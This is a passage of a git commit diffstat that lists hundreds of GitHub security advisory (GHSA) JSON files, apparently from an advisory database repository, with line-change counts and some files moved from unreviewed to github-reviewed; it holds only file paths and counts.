38 ++++ .../GHSA-c344-5fxf-w34m.json | 38 ++++ .../GHSA-c37g-ppfr-pj55.json | 38 ++++ .../GHSA-c3hc-353g-xvq9.json | 42 ++++ .../GHSA-c3j2-cg9f-6vvm.json | 42 ++++ .../GHSA-c4qh-w68f-gq2f.json | 39 ++++ .../GHSA-c52r-8hmj-x4qg.json | 6 +- .../GHSA-c5fj-m6rf-9968.json | 38 ++++ .../GHSA-c62v-4j3q-wm9h.json | 38 ++++ .../GHSA-c732-w2pw-3g36.json | 38 ++++ .../GHSA-c76r-g8q5-m4cv.json | 38 ++++ .../GHSA-c7ff-hjxw-jhqv.json | 38 ++++ .../GHSA-c8c4-3mwr-7x6g.json | 38 ++++ .../GHSA-c8c6-87mv-3fm9.json | 39 ++++ .../GHSA-c96c-x4rr-r9qq.json | 58 +++++ .../GHSA-c9p6-gwj4-77pf.json | 38 ++++ .../GHSA-c9v6-58hr-jv8c.json | 42 ++++ .../GHSA-ccq8-85cf-r5qh.json | 50 +++++ .../GHSA-cf2p-hqc9-vhmw.json | 43 ++++ .../GHSA-cfhh-2gpx-32wx.json | 38 ++++ .../GHSA-cfrx-fq8m-28pv.json | 38 ++++ .../GHSA-cfvh-g2xj-xxg8.json | 38 ++++ .../GHSA-cg4x-ccfp-j6q9.json | 38 ++++ .../GHSA-cg9r-m2qr-hvvj.json | 39 ++++ .../GHSA-chvw-vg4m-qwm6.json | 38 ++++ .../GHSA-cj94-qf5w-fg9c.json | 35 +++ .../GHSA-cjgj-qv8v-fhgh.json | 38 ++++ .../GHSA-cjj3-f3rf-jf7w.json | 42 ++++ .../GHSA-cjm7-r96j-5xx3.json | 38 ++++ .../GHSA-cm43-2v3p-vgjx.json | 46 ++++ .../GHSA-cmqc-wqwj-vjqx.json | 35 +++ .../GHSA-cp28-995c-wj8q.json | 38 ++++ .../GHSA-cp8r-2jwf-q8jj.json | 43 ++++ .../GHSA-cpff-vh9v-hmch.json | 35 +++ .../GHSA-cpj9-hvqw-3m28.json | 50 +++++ .../GHSA-cpv9-x52v-j5m3.json | 42 ++++ .../GHSA-cq2v-6q97-jv69.json | 47 ++++ .../GHSA-crxg-6xqc-vwm7.json | 35 +++ .../GHSA-cv85-hcw5-w2q9.json | 42 ++++ .../GHSA-cvxw-g73w-j934.json | 42 ++++ .../GHSA-cw34-gw9h-rxc6.json | 38 ++++ .../GHSA-cw53-9wpp-83r6.json | 38 ++++ .../GHSA-cw5w-c3p6-8w6w.json | 38 ++++ .../GHSA-cw6g-w5px-p549.json | 38 ++++ .../GHSA-cwrx-2mp2-4j43.json | 38 ++++ .../GHSA-cwxc-rm5r-crmq.json | 42 ++++ .../GHSA-cx5j-3q3c-fg8h.json | 38 ++++ .../GHSA-cx69-4g9j-c8p8.json | 39 ++++ .../GHSA-f2gr-27p7-5q73.json | 42 ++++ .../GHSA-f326-f55x-34r3.json | 50 +++++ .../GHSA-f34r-fpcq-6r8w.json | 35 +++ .../GHSA-f3g2-hmgr-q2mj.json | 42 ++++ .../GHSA-f3hc-9q6r-j846.json | 38 ++++ .../GHSA-f3q5-vrp5-crqj.json | 39 ++++ .../GHSA-f3x6-c3gw-gv5x.json | 42 ++++ .../GHSA-f43f-crxx-fcfm.json | 46 ++++ .../GHSA-f4mq-rqpq-pqgh.json | 35 +++ .../GHSA-f54w-4qr9-j5hw.json | 50 +++++ .../GHSA-f6rh-8x43-h7fg.json | 43 ++++ .../GHSA-f8c8-rxc7-wvjc.json | 38 ++++ .../GHSA-f993-46p6-8jh9.json | 42 ++++ .../GHSA-f9gm-fvch-xf3r.json | 38 ++++ .../GHSA-f9h9-2656-9px8.json | 38 ++++ .../GHSA-fc56-xpwv-3gp9.json | 50 +++++ .../GHSA-fg6v-9r8w-4p8h.json | 38 ++++ .../GHSA-fgjr-q739-ggx5.json | 54 +++++ .../GHSA-fgq8-q7cm-9vxf.json | 50 +++++ .../GHSA-fhx3-jwgv-mpc2.json | 11 +- .../GHSA-fhx3-mxf6-jxpv.json | 43 ++++ .../GHSA-fj2v-p3c3-xxcr.json | 46 ++++ .../GHSA-fjjf-hfph-8mm9.json | 46 ++++ .../GHSA-fmf7-vf6x-cv7g.json | 39 ++++ .../GHSA-fphx-r25q-xqhv.json | 35 +++ .../GHSA-fpvp-qqmr-38cx.json | 35 +++ .../GHSA-fq8c-827p-q5gh.json | 42 ++++ .../GHSA-fqq4-qr43-h5jq.json | 42 ++++ .../GHSA-fqqx-226c-w34m.json | 50 +++++ .../GHSA-fr43-fjr4-5gq9.json | 50 +++++ .../GHSA-fr6q-c249-g62p.json | 42 ++++ .../GHSA-frjv-mxj9-42h2.json | 50 +++++ .../GHSA-fv9f-467f-xm3f.json | 39 ++++ .../GHSA-fvg7-9wxr-q3x3.json | 38 ++++ .../GHSA-fvm8-pgm7-cg8j.json | 46 ++++ .../GHSA-fvm9-r7wp-vc8g.json | 38 ++++ .../GHSA-fvp5-7g7m-vxw4.json | 50 +++++ .../GHSA-fw35-8hjm-jw2p.json | 43 ++++ .../GHSA-fxc7-vj9h-93hg.json | 50 +++++ .../GHSA-g2p3-5v58-cqcv.json | 38 ++++ .../GHSA-g2vx-prh9-62c4.json | 38 ++++ .../GHSA-g36v-5299-38pr.json | 38 ++++ .../GHSA-g42r-4xc7-377c.json | 35 +++ .../GHSA-g44m-x5h7-fr5q.json | 39 ++++ .../GHSA-g459-f54g-xh4f.json | 38 ++++ .../GHSA-g47c-q844-rxj3.json | 39 ++++ .../GHSA-g47h-q6pp-ww7f.json | 50 +++++ .../GHSA-g4rj-2pvr-77xv.json | 38 ++++ .../GHSA-g6h9-ww5f-gjp4.json | 50 +++++ .../GHSA-g6jj-43rf-3wc6.json | 38 ++++ .../GHSA-g726-jqm5-9q9f.json | 35 +++ .../GHSA-g734-xxmw-4f5p.json | 50 +++++ .../GHSA-g77x-hh5w-qpw7.json | 35 +++ .../GHSA-g7vh-v2c6-r3fm.json | 42 ++++ .../GHSA-g96r-m5m9-8hqg.json | 38 ++++ .../GHSA-g9wx-gpxj-x55q.json | 50 +++++ .../GHSA-gc37-9w9h-6m6g.json | 46 ++++ .../GHSA-gcc4-7369-8cwv.json | 50 +++++ .../GHSA-gchv-5rxx-7j87.json | 38 ++++ .../GHSA-gcvf-qqcq-825h.json | 35 +++ .../GHSA-gcxm-gg23-j9vq.json | 38 ++++ .../GHSA-gf6m-w8fj-44h4.json | 38 ++++ .../GHSA-gfgm-4g66-q77w.json | 42 ++++ .../GHSA-gg76-g2w9-wqqw.json | 35 +++ .../GHSA-gg92-hmqr-8q27.json | 46 ++++ .../GHSA-ghhm-r8cf-62x2.json | 38 ++++ .../GHSA-gj98-p2xm-q3hc.json | 38 ++++ .../GHSA-gjhv-xhv4-pm88.json | 38 ++++ .../GHSA-gmc7-25r9-p22h.json | 11 +- .../GHSA-gmw5-2r8g-6fwc.json | 35 +++ .../GHSA-gp4v-h769-65rh.json | 35 +++ .../GHSA-gpf5-g943-4fxx.json | 35 +++ .../GHSA-gppc-qq77-689m.json | 50 +++++ .../GHSA-gpww-pph3-m8m9.json | 38 ++++ .../GHSA-gq8c-325r-rg8h.json | 50 +++++ .../GHSA-gr3f-xv9f-q294.json | 38 ++++ .../GHSA-gvjj-h5vf-62m3.json | 50 +++++ .../GHSA-gvx8-48wf-x3q7.json | 38 ++++ .../GHSA-gw7j-rv4v-wrcj.json | 38 ++++ .../GHSA-gwc6-967v-4vjj.json | 50 +++++ .../GHSA-gwg6-qpjp-9h2w.json | 50 +++++ .../GHSA-gwgm-pgv3-cwqf.json | 38 ++++ .../GHSA-gwxj-rjc5-w9mq.json | 39 ++++ .../GHSA-gx42-cj7r-h5xp.json | 35 +++ .../GHSA-gx7g-x5pw-4h97.json | 38 ++++ .../GHSA-gxgx-2mvf-9gh5.json | 43 ++++ .../GHSA-gxj6-9wjm-8228.json | 38 ++++ .../GHSA-h28q-32f7-jxrv.json | 42 ++++ .../GHSA-h2xm-59gc-23mm.json | 35 +++ .../GHSA-h3j9-9865-w4pw.json | 35 +++ .../GHSA-h3v7-q8j4-9rw9.json | 42 ++++ .../GHSA-h458-4c82-j96q.json | 39 ++++ .../GHSA-h4c3-x7vv-8q28.json | 39 ++++ .../GHSA-h4mw-pww9-9c5r.json | 39 ++++ .../GHSA-h574-gj9q-j8mx.json | 38 ++++ .../GHSA-h5r4-2c2f-fx7f.json | 42 ++++ .../GHSA-h63r-7v46-7432.json | 39 ++++ .../GHSA-h66x-39x2-5rv8.json | 38 ++++ .../GHSA-h6c4-wr98-9px9.json | 35 +++ .../GHSA-h6cc-4vmm-cxpp.json | 42 ++++ .../GHSA-h72f-rgrp-ff8g.json | 50 +++++ .../GHSA-h88v-572r-gvxx.json | 46 ++++ .../GHSA-h896-g8fr-jxm5.json | 42 ++++ .../GHSA-h8hv-7w37-m54g.json | 39 ++++ .../GHSA-h8j8-56g9-735m.json | 35 +++ .../GHSA-h939-p6c6-9fwj.json | 35 +++ .../GHSA-h95w-mc8p-wm53.json | 38 ++++ .../GHSA-hcfm-v43m-qw33.json | 38 ++++ .../GHSA-hf6h-cv6q-2jpq.json | 35 +++ .../GHSA-hh28-wc7c-m2r4.json | 38 ++++ .../GHSA-hh4j-79fp-m79v.json | 50 +++++ .../GHSA-hhf4-hp7g-q328.json | 50 +++++ .../GHSA-hj2q-hv94-pwwx.json | 46 ++++ .../GHSA-hj8p-jr2c-9cmj.json | 42 ++++ .../GHSA-hjg7-j422-h7p9.json | 39 ++++ .../GHSA-hm2g-j35v-6vxh.json | 43 ++++ .../GHSA-hm5j-36v4-g9h6.json | 38 ++++ .../GHSA-hp4q-94j3-v97q.json | 38 ++++ .../GHSA-hpjc-v8f5-7fg8.json | 38 ++++ .../GHSA-hpm2-9x59-72x4.json | 46 ++++ .../GHSA-hq3q-jwq2-6p5h.json | 38 ++++ .../GHSA-hqgx-pm48-7q37.json | 38 ++++ .../GHSA-hrmq-cvm6-g5v6.json | 50 +++++ .../GHSA-hrxg-27x5-39h2.json | 42 ++++ .../GHSA-hw4f-q5qf-mr8m.json | 38 ++++ .../GHSA-hw6g-94cf-m7rp.json | 42 ++++ .../GHSA-hw9j-mg68-r593.json | 38 ++++ .../GHSA-hx3x-jq5m-p7xj.json | 38 ++++ .../GHSA-hxvx-w43m-m8wv.json | 38 ++++ .../GHSA-j254-m7h5-8jrj.json | 38 ++++ .../GHSA-j2ch-c7pg-phcj.json | 42 ++++ .../GHSA-j583-rf4p-48jc.json | 50 +++++ .../GHSA-j5pj-xphh-fc8m.json | 50 +++++ .../GHSA-j65r-8hrg-qc6x.json | 38 ++++ .../GHSA-j6hc-65ch-6v6p.json | 42 ++++ .../GHSA-j6hp-5gxf-7pf4.json | 38 ++++ .../GHSA-j6v2-qq8h-fqr7.json | 35 +++ .../GHSA-j78w-6r6c-3p5g.json | 35 +++ .../GHSA-j7g7-47xx-jxr6.json | 50 +++++ .../GHSA-j7rv-jv5c-9879.json | 46 ++++ .../GHSA-j87x-xq7w-hp68.json | 35 +++ .../GHSA-j8pv-jpqp-m29p.json | 35 +++ .../GHSA-j947-jfqc-5v3q.json | 35 +++ .../GHSA-j9j7-vrc8-64wq.json | 39 ++++ .../GHSA-j9xw-m2f5-m3r5.json | 46 ++++ .../GHSA-jcrv-j83j-p76q.json | 46 ++++ .../GHSA-jfm9-vph2-8wfq.json | 35 +++ .../GHSA-jfpx-r6jw-f765.json | 38 ++++ .../GHSA-jfx7-45mm-rw3j.json | 42 ++++ .../GHSA-jhv2-r46h-r3rr.json | 35 +++ .../GHSA-jhv7-rhr9-5c2j.json | 39 ++++ .../GHSA-jjch-qg3j-855w.json | 38 ++++ .../GHSA-jjfv-x9mq-7m6v.json | 50 +++++ .../GHSA-jjrv-fcm6-q55q.json | 50 +++++ .../GHSA-jpmf-chch-c98m.json | 42 ++++ .../GHSA-jpmx-996v-48fm.json | 42 ++++ .../GHSA-jqcw-7ccj-65rw.json | 39 ++++ .../GHSA-jrf6-frj2-w4m8.json | 42 ++++ .../GHSA-jrgr-wxrg-4cj3.json | 50 +++++ .../GHSA-jvcr-j6x4-hh24.json | 38 ++++ .../GHSA-jw4m-rwmx-c8ph.json | 35 +++ .../GHSA-jwh4-5rh5-9844.json | 35 +++ .../GHSA-jwwf-6j78-h8g4.json | 42 ++++ .../GHSA-jx53-mj26-45vm.json | 42 ++++ .../GHSA-jx7f-v5r5-55j4.json | 39 ++++ .../GHSA-jx9r-9m63-c2rc.json | 42 ++++ .../GHSA-jx9x-jrf9-63v4.json | 39 ++++ .../GHSA-m289-xpfv-pfp5.json | 50 +++++ .../GHSA-m32q-g43c-p863.json | 38 ++++ .../GHSA-m3pg-c9mv-657r.json | 38 ++++ .../GHSA-m52g-q6h9-ggm5.json | 50 +++++ .../GHSA-m52h-743p-4255.json | 50 +++++ .../GHSA-m5gq-xfj3-7366.json | 43 ++++ .../GHSA-m5v4-f2gf-v6x5.json | 38 ++++ .../GHSA-m6gg-639w-rh6m.json | 42 ++++ .../GHSA-m7f8-xj6j-5x9x.json | 35 +++ .../GHSA-m83g-jj6q-34wp.json | 46 ++++ .../GHSA-m87m-mh9g-fvv5.json | 35 +++ .../GHSA-m8hx-m8xm-2r63.json | 46 ++++ .../GHSA-m9f8-h39r-m8r2.json | 35 +++ .../GHSA-m9v7-qqvg-7f89.json | 39 ++++ .../GHSA-mcv4-77gg-xfvp.json | 38 ++++ .../GHSA-mg9j-5xr7-3245.json | 42 ++++ .../GHSA-mg9w-gjgf-qggr.json | 35 +++ .../GHSA-mggj-wcpg-x6cm.json | 35 +++ .../GHSA-mghh-4m9h-vqxx.json | 38 ++++ .../GHSA-mgwp-p2g9-cmqr.json | 39 ++++ .../GHSA-mh2p-2x66-3hr4.json | 39 ++++ .../GHSA-mhm4-4xwv-3x8f.json | 39 ++++ .../GHSA-mj6g-39xm-96q9.json | 38 ++++ .../GHSA-mjp5-p6j6-39pw.json | 46 ++++ .../GHSA-mpmm-hvxp-c3m8.json | 50 +++++ .../GHSA-mq6j-35mg-9rj6.json | 35 +++ .../GHSA-mqq7-33jf-2x53.json | 46 ++++ .../GHSA-mqr2-w7wj-jjgr.json | 50 +++++ .../GHSA-mvf3-qj92-4c7r.json | 38 ++++ .../GHSA-mvmm-9v72-f3h4.json | 35 +++ .../GHSA-mw2h-9mqr-794q.json | 38 ++++ .../GHSA-mw3g-jr7f-3gg4.json | 67 ++++++ .../GHSA-mw9v-x4m4-66v4.json | 38 ++++ .../GHSA-mwrm-5xj9-hg36.json | 38 ++++ .../GHSA-mwxw-jp9c-r89r.json | 38 ++++ .../GHSA-mx7w-qx25-cc3c.json | 38 ++++ .../GHSA-mxcm-w7fm-9qr2.json | 35 +++ .../GHSA-mxpv-g3w9-rggw.json | 38 ++++ .../GHSA-p25p-77fc-q58p.json | 42 ++++ .../GHSA-p2cg-w533-rqh5.json | 38 ++++ .../GHSA-p2r5-c3vr-q4j5.json | 42 ++++ .../GHSA-p33p-qh45-v5wf.json | 35 +++ .../GHSA-p35f-8932-32f3.json | 35 +++ .../GHSA-p36x-xwm4-rxfm.json | 38 ++++ .../GHSA-p5vg-cxw5-p93v.json | 38 ++++ .../GHSA-p6rw-7v7m-xm65.json | 38 ++++ .../GHSA-p7hg-rgff-9395.json | 50 +++++ .../GHSA-p7w3-3fmw-7j74.json | 35 +++ .../GHSA-p854-chwv-28c2.json | 38 ++++ .../GHSA-p8w6-cvmc-rg5g.json | 38 ++++ .../GHSA-p9c6-wr4p-mpm5.json | 31 +++ .../GHSA-p9h2-24g6-pg7j.json | 38 ++++ .../GHSA-pc56-3cp6-3733.json | 35 +++ .../GHSA-pcjj-9wx4-9phh.json | 42 ++++ .../GHSA-pf5m-h35j-7c4j.json | 6 +- .../GHSA-pg3r-pc9w-hjp2.json | 38 ++++ .../GHSA-pgc5-vrj2-c9w5.json | 6 +- .../GHSA-ph38-v5mc-q38p.json | 42 ++++ .../GHSA-phm8-vx8c-46hm.json | 38 ++++ .../GHSA-phmv-qjxc-9jxj.json | 38 ++++ .../GHSA-phxq-f9jh-xw45.json | 50 +++++ .../GHSA-pjcp-cwxx-6f4x.json | 42 ++++ .../GHSA-pp2r-p867-hj9h.json | 42 ++++ .../GHSA-pp2x-pgm4-hc2c.json | 38 ++++ .../GHSA-pppv-cq2v-65wm.json | 50 +++++ .../GHSA-pq39-f58p-6f4p.json | 39 ++++ .../GHSA-prq6-rh2c-gq39.json | 35 +++ .../GHSA-prqm-j32h-gr46.json | 38 ++++ .../GHSA-pv4q-pg8h-7p42.json | 42 ++++ .../GHSA-pv68-rq6c-c32j.json | 46 ++++ .../GHSA-pvvv-mm99-9qf2.json | 42 ++++ .../GHSA-pw55-22x2-xqg6.json | 38 ++++ .../GHSA-pw86-gvc3-5wvh.json | 35 +++ .../GHSA-pwvw-3h9f-9875.json | 38 ++++ .../GHSA-pwwp-53vp-7mv3.json | 50 +++++ .../GHSA-pxfw-cxx3-vxv8.json | 39 ++++ .../GHSA-pxr3-23fx-4vxx.json | 38 ++++ .../GHSA-q2j3-wpw2-58vq.json | 35 +++ .../GHSA-q32p-r22r-wrmj.json | 38 ++++ .../GHSA-q36g-c4c7-q48x.json | 42 ++++ .../GHSA-q3q6-3x37-g8gw.json | 42 ++++ .../GHSA-q3rj-qhqx-qhgm.json | 42 ++++ .../GHSA-q4p6-cgp6-mwqw.json | 38 ++++ .../GHSA-q4v8-vmvc-x4jm.json | 50 +++++ .../GHSA-q6m7-j3hp-j7rg.json | 42 ++++ .../GHSA-q6v4-gg2w-f97v.json | 38 ++++ .../GHSA-q6wr-5cjv-cqvh.json | 38 ++++ .../GHSA-q7jc-6mj7-vqp9.json | 46 ++++ .../GHSA-q8c2-3rhw-wc9h.json | 38 ++++ .../GHSA-q9gh-68qf-6p2r.json | 38 ++++ .../GHSA-qc5p-mrgm-82mp.json | 38 ++++ .../GHSA-qc8v-ph93-7gqw.json | 38 ++++ .../GHSA-qcfj-j39h-f57v.json | 50 +++++ .../GHSA-qcfv-94fj-42jc.json | 39 ++++ .../GHSA-qcrm-33g9-cjcc.json | 38 ++++ .../GHSA-qfrm-3569-884r.json | 39 ++++ .../GHSA-qg8g-vp27-m3p5.json | 35 +++ .../GHSA-qh29-9j77-hqw6.json | 42 ++++ .../GHSA-qmr3-52xf-wmhx.json | 39 ++++ .../GHSA-qp6j-fjg3-9x3h.json | 42 ++++ .../GHSA-qpf9-jjvw-pxf2.json | 35 +++ .../GHSA-qpqh-hxc9-r48w.json | 38 ++++ .../GHSA-qq7h-25rf-f89f.json | 38 ++++ .../GHSA-qqv3-2v93-cwjw.json | 42 ++++ .../GHSA-qr85-xmff-4wqh.json | 42 ++++ .../GHSA-qvf6-37g9-5jpr.json | 42 ++++ .../GHSA-qvj2-mp9w-8qjx.json | 42 ++++ .../GHSA-qvqf-5w2r-xjgr.json | 38 ++++ .../GHSA-qxqw-792j-v657.json | 38 ++++ .../GHSA-r225-49p5-w9vp.json | 42 ++++ .../GHSA-r247-cqp5-chrp.json | 35 +++ .../GHSA-r382-73hv-r5j2.json | 39 ++++ .../GHSA-r38q-xpfq-7wq4.json | 38 ++++ .../GHSA-r3r2-738c-mhc2.json | 46 ++++ .../GHSA-r4cp-3jcm-fv88.json | 38 ++++ .../GHSA-r4jj-84rh-4pf7.json | 46 ++++ .../GHSA-r4pm-pfvm-5c7r.json | 50 +++++ .../GHSA-r537-5p8w-qx89.json | 35 +++ .../GHSA-r5c7-85f6-wq78.json | 38 ++++ .../GHSA-r5gr-4cwq-69gg.json | 35 +++ .../GHSA-r63f-6gcw-2c47.json | 42 ++++ .../GHSA-r66f-5793-9ccw.json | 35 +++ .../GHSA-r68q-m8c2-v4c3.json | 38 ++++ .../GHSA-r6hr-43qj-mqc6.json | 38 ++++ .../GHSA-r7xx-h3jw-fq3j.json | 42 ++++ .../GHSA-r8f4-r8pc-7q4p.json | 42 ++++ .../GHSA-r8v8-787r-c5p4.json | 42 ++++ .../GHSA-r9c4-3p3w-9g45.json | 38 ++++ .../GHSA-r9g8-4h9q-3jfp.json | 39 ++++ .../GHSA-rc3h-x674-fmwq.json | 38 ++++ .../GHSA-rccf-3gfp-fhpv.json | 39 ++++ .../GHSA-rcpr-8gfx-9xrm.json | 43 ++++ .../GHSA-rfh9-p2f9-5x7m.json | 46 ++++ .../GHSA-rfj2-jrc4-h4mr.json | 38 ++++ .../GHSA-rfq8-469g-mx7f.json | 43 ++++ .../GHSA-rg68-wq7j-fhjx.json | 38 ++++ .../GHSA-rgmh-52xq-8wg7.json | 39 ++++ .../GHSA-rgmx-cc87-595r.json | 38 ++++ .../GHSA-rgvf-j3x5-6277.json | 46 ++++ .../GHSA-rgwx-4v25-2mj5.json | 38 ++++ .../GHSA-rgx7-8wqv-m224.json | 43 ++++ .../GHSA-rh4m-vg7c-86x5.json | 38 ++++ .../GHSA-rh8m-cg7r-67h7.json | 42 ++++ .../GHSA-rhg5-7x2m-pq53.json | 42 ++++ .../GHSA-rhxw-9g9h-jr2x.json | 38 ++++ .../GHSA-rjmx-4pf7-6fpx.json | 38 ++++ .../GHSA-rm4x-93m8-4qcv.json | 38 ++++ .../GHSA-rm7r-xfxm-p2qm.json | 38 ++++ .../GHSA-rm8w-vp6f-85hq.json | 50 +++++ .../GHSA-rmmj-g3w6-w438.json | 35 +++ .../GHSA-rpxx-wr6g-h998.json | 46 ++++ .../GHSA-rq49-j5jp-7mr4.json | 39 ++++ .../GHSA-rqgg-9h2q-r225.json | 42 ++++ .../GHSA-rqp6-4qqm-mqcw.json | 42 ++++ .../GHSA-rr32-xpf4-hwj6.json | 38 ++++ .../GHSA-rrrg-rj55-27wm.json | 50 +++++ .../GHSA-rrvf-5w4r-3x7v.json | 39 ++++ .../GHSA-rrxr-p69x-ghh9.json | 35 +++ .../GHSA-rvh5-mpf7-h5hf.json | 38 ++++ .../GHSA-rwg6-5v43-7mq2.json | 38 ++++ .../GHSA-rwv9-q2h8-5644.json | 38 ++++ .../GHSA-rx2w-fqqj-rp5m.json | 50 +++++ .../GHSA-v249-g5w5-7hcv.json | 42 ++++ .../GHSA-v2jv-hxvv-r7j7.json | 35 +++ .../GHSA-v3cc-gxvr-wp29.json | 39 ++++ .../GHSA-v429-7w83-5cc5.json | 38 ++++ .../GHSA-v45f-j4h4-qjp6.json | 50 +++++ .../GHSA-v4p3-mv8c-jvgx.json | 38 ++++ .../GHSA-v5g8-p43f-vv3p.json | 43 ++++ .../GHSA-v5gh-4369-4w97.json | 35 +++ .../GHSA-v74g-7hwm-jpjc.json | 35 +++ .../GHSA-v832-7hv6-458x.json | 38 ++++ .../GHSA-v92r-jqh2-f2xx.json | 42 ++++ .../GHSA-v9hm-fcq5-j7h7.json | 35 +++ .../GHSA-vf3g-q2rg-c398.json | 39 ++++ .../GHSA-vf3j-xp87-c8f3.json | 38 ++++ .../GHSA-vfqq-mj6j-2rqq.json | 39 ++++ .../GHSA-vfrv-pg2f-4468.json | 42 ++++ .../GHSA-vfvp-6x8c-w6jm.json | 42 ++++ .../GHSA-vg84-7fr9-9r2h.json | 35 +++ .../GHSA-vgxh-95xm-c2p8.json | 50 +++++ .../GHSA-vhhh-r6h5-2r9f.json | 38 ++++ .../GHSA-vjgv-q4qp-fr6p.json | 46 ++++ .../GHSA-vjh4-v73g-fc8r.json | 42 ++++ .../GHSA-vjwp-m299-85vg.json | 38 ++++ .../GHSA-vm7h-73m3-4232.json | 35 +++ .../GHSA-vmxm-7mh7-6wxv.json | 50 +++++ .../GHSA-vp88-rj49-wqhp.json | 46 ++++ .../GHSA-vr93-vfw5-rhwx.json | 35 +++ .../GHSA-vvm6-xgvv-w5gg.json | 42 ++++ .../GHSA-w249-f84q-3v47.json | 50 +++++ .../GHSA-w27w-5f55-hf65.json | 38 ++++ .../GHSA-w36m-8p9q-xcc9.json | 35 +++ .../GHSA-w4pg-xm2c-w4wj.json | 38 ++++ .../GHSA-w572-29mg-j3qq.json | 50 +++++ .../GHSA-w6hq-2wh4-49vf.json | 50 +++++ .../GHSA-w6vh-49p9-j7c9.json | 42 ++++ .../GHSA-w7w7-xr2r-4x55.json | 39 ++++ .../GHSA-w7x4-hw9x-fprc.json | 35 +++ .../GHSA-w9cw-hv7g-qxq8.json | 38 ++++ .../GHSA-w9xx-xhpg-c678.json | 38 ++++ .../GHSA-wc5v-66fr-qmw9.json | 35 +++ .../GHSA-wc9x-r2g7-vjwr.json | 38 ++++ .../GHSA-wchq-g5j3-gg9g.json | 38 ++++ .../GHSA-wcvh-xmqp-jw7f.json | 50 +++++ .../GHSA-wfj3-v98m-r3p5.json | 38 ++++ .../GHSA-wfjh-ffgr-5v9q.json | 35 +++ .../GHSA-wfw8-wpjj-mf7v.json | 38 ++++ .../GHSA-wfx2-88mh-r97m.json | 42 ++++ .../GHSA-wg24-v48r-f3mm.json | 38 ++++ .../GHSA-wgrq-q2w8-p9x4.json | 43 ++++ .../GHSA-wh4m-6rh3-p4rq.json | 38 ++++ .../GHSA-wh8c-8787-2j2f.json | 35 +++ .../GHSA-wj9q-7qxv-7f57.json | 50 +++++ .../GHSA-wjmr-v62x-4f45.json | 42 ++++ .../GHSA-wm52-4cc3-xxgg.json | 38 ++++ .../GHSA-wmx4-3g32-fg7m.json | 38 ++++ .../GHSA-wp5p-62cp-gpq5.json | 42 ++++ .../GHSA-wpf2-cf85-jvfv.json | 38 ++++ .../GHSA-wprh-m7mq-qhfq.json | 38 ++++ .../GHSA-wpv3-6qr5-9rmx.json | 39 ++++ .../GHSA-wq6m-mcm5-qhcj.json | 38 ++++ .../GHSA-wqv6-gf55-v5gj.json | 35 +++ .../GHSA-wvjq-4p9q-4q7p.json | 38 ++++ .../GHSA-wvqc-rrc5-mp8p.json | 35 +++ .../GHSA-wvrc-7835-9grj.json | 42 ++++ .../GHSA-wvxc-855f-jvrv.json | 38 ++++ .../GHSA-ww88-jw5q-2479.json | 50 +++++ .../GHSA-wx98-g485-pgfr.json | 38 ++++ .../GHSA-wxvv-7x57-mjgj.json | 43 ++++ .../GHSA-x237-rgmj-6rg4.json | 38 ++++ .../GHSA-x246-w3fc-9p6h.json | 39 ++++ .../GHSA-x2m4-5rqp-rhvq.json | 35 +++ .../GHSA-x498-p429-582w.json | 38 ++++ .../GHSA-x57p-235m-crc8.json | 35 +++ .../GHSA-x5g3-vjqh-jg6c.json | 35 +++ .../GHSA-x67v-qcqh-2rvg.json | 42 ++++ .../GHSA-x6h6-66j7-3gwr.json | 50 +++++ .../GHSA-x6hw-w2wh-qw7c.json | 50 +++++ .../GHSA-x6pg-hxcx-rghj.json | 50 +++++ .../GHSA-x723-q7ww-gm79.json | 42 ++++ .../GHSA-x767-6775-vv77.json | 38 ++++ .../GHSA-x866-v2pc-mx93.json | 38 ++++ .../GHSA-x8m6-m5rq-285x.json | 35 +++ .../GHSA-x8rm-m93r-jqp2.json | 35 +++ .../GHSA-x8rv-vr65-phwh.json | 39 ++++ .../GHSA-x9g4-2m6v-c5cx.json | 42 ++++ .../GHSA-xcx5-wxfr-wq9r.json | 38 ++++ .../GHSA-xcxv-67v8-jc88.json | 38 ++++ .../GHSA-xg42-vmfr-25f3.json | 42 ++++ .../GHSA-xgm2-9pcq-75hg.json | 38 ++++ .../GHSA-xgv9-xhqv-rqvg.json | 38 ++++ .../GHSA-xhgx-7r6h-x8hf.json | 39 ++++ .../GHSA-xhh7-pjwc-jm9m.json | 38 ++++ .../GHSA-xj3v-fcjw-gv7p.json | 35 +++ .../GHSA-xjcx-58p2-6mm5.json | 42 ++++ .../GHSA-xjj5-mp7v-39hq.json | 35 +++ .../GHSA-xjx3-j32m-446r.json | 38 ++++ .../GHSA-xp2j-75cr-2mjj.json | 42 ++++ .../GHSA-xqjq-j9cx-q953.json | 35 +++ .../GHSA-xr98-c22v-cfcg.json | 51 +++++ .../GHSA-xwrr-gvqm-j58v.json | 35 +++ .../GHSA-xx2r-2w7h-qwpc.json | 38 ++++ 995 files changed, 35506 insertions(+), 461 deletions(-) create mode 100644 advisories/github-reviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json create mode 100644 advisories/github-reviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json (53%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json (53%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json (54%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json (61%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json (54%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json (54%) rename advisories/{unreviewed => github-reviewed}/2022/05/GHSA-xc7w-jvhx-p6q9/GHSA-xc7w-jvhx-p6q9.json (56%) rename advisories/{unreviewed => github-reviewed}/2022/09/GHSA-7pf9-7cff-f854/GHSA-7pf9-7cff-f854.json (51%) rename advisories/{unreviewed => github-reviewed}/2024/03/GHSA-9mg4-v392-8j68/GHSA-9mg4-v392-8j68.json (52%) create mode 100644 advisories/github-reviewed/2024/04/GHSA-2p2x-p7wj-j5h2/GHSA-2p2x-p7wj-j5h2.json create mode 100644 advisories/github-reviewed/2024/04/GHSA-2v42-xp3j-47m4/GHSA-2v42-xp3j-47m4.json create mode 100644 